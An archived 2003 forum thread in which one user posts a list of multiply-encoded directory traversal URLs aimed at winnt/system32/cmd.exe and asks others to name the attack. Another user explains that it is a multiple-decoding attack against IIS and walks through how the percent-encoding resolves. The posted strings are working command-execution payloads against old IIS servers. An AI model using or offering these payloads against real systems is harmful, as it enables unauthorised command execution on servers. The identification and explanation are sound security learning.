Name this one... [Archive] - Screaming Electron Forums

soup4you2

June 30th, 2003, 11:45

[code:1:360bb670a5] /..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir+c:
[/code:1:360bb670a5]

:)

bsdjunkie

June 30th, 2003, 13:31

Multiple decoding attack against IIS.

%5c = \

%25 = %
%35 = 5
%63 = c

so

/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:

is the same as /..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:

So its trying to be trickier by encoding the characters again.

etc....

:roll:

soup4you2

June 30th, 2003, 13:54

Good job...

here's the URL for more info about this...

http://neworder.box.sk/newsread_print.php?newsid=8465